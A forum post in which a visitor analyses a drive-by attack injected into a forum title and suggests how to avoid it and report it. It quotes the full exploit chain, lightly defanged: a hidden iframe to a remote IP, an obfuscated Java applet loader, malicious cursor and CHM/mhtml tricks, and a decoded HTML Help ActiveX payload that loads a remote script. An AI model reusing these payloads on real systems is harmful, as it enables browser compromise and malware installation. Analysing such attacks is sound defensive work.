The culprit seems to be in the title of the V.I.P. forum, so I think only pages showing that title (for example the forum index) will cause problems. A moderator with sufficient priviliges, or the site owner, could change the title back.
The initial offending code is (I changed the <> parts of the HTML tags to {} to avoid it being accidently triggered):
Code:
{span class="genmed"}This forum is for V.I.P. (Victoria Improvement Project) for Victoria{iframe src="http://195.95.218.173/dl/adv439.php" width=0 height=0 style="display:none"}{/iframe}{/span}
That inline frame then proceeds to load the following:
Code:
{html}{head}
{/head}{body}
{style}
* {CURSOR: url("http://195.95.218.173/dl/adv439/sploit.anr")}
{/style}
{script}
try{
document.write('{applet'+' width=1 height=1 '+'ARCHIVE=loader'+'adv439.jar co'+'de=Counter}{/AP'+'PLET}');
document.write('{object data="&#'+109+';s-its:mhtml'+':'+'file://C:\nosuch.mht!http://195.95.218.173/dl/adv439/x.chm::/x.htm" type="text/x-scriptlet"}{/object}');
}catch(e){}
{/script}
{IFRAME SRC="http://195.95.218.173/dl/newexpl.php?adv=adv439" WIDTH=0 BORDER=0 HEIGHT=0 style="display:none"}{/IFRAME}
{/body}{/html}
I'm no expert on this but I think several exploits are being tried here: something with a cursor image loading, a Java applet that tried to stay under the radar by having it's code obfuscated, something possibly trying to execute code on your machine by creating an error and pretending to be the proper error page, and finally the newexpl.php thing.
The newexpl.php contains a base64 encoded piece of HTML, which decoded looks like this:
Code:
{!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"}
{HTML}{BODY}
{OBJECT style="display:none" id="asdqwe" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"}
{PARAM name="Command" value="Related Topics, MENU"}
{PARAM name="Button" value="Text:_"}
{PARAM name="Window" value="$global_blank"}
{PARAM name="Item1" value="command;ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_specific.htm"}
{/OBJECT}
{OBJECT style="display:none" id="asdqwer" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"}
{PARAM name="Command" value="Related Topics, MENU"}
{PARAM name="Button" value="Text:_"}
{PARAM name="Window" value="$global_blank"}
{PARAM name="Item1" value='command; javascript:execScript("document.write(\"{script src=http://195.95.218.173/dl/adv439/JQTmudI.jpg\"+String.fromCharCode(62)+\"{/scr\"+\"ipt\"+String.fromCharCode(62))")'}
{/OBJECT}
{script}asdqwe.HHClick();setTimeout("asdqwer.HHClick()",100);setTimeout("document.write('')",200){/script}{/BODY}{/HTML}
Again this seems to try several exploits, all originating from 195.95.218.173 (a computer in Estonia). An abuse report could be sent to
abuse@esthost.com, but since I am but a mere visitor of the site, I think it would be better if someone more officially affiliated with it would do so.
EDIT: By the way, turning off inline frames should prevent the problem, and
going to the C.O.R.E. for HoI 2 forum directly should work too. Do it at your own risk though. If you browser is broken and executes things without asking you first, and you accidently goto the forum index, you could trigger all those exploits.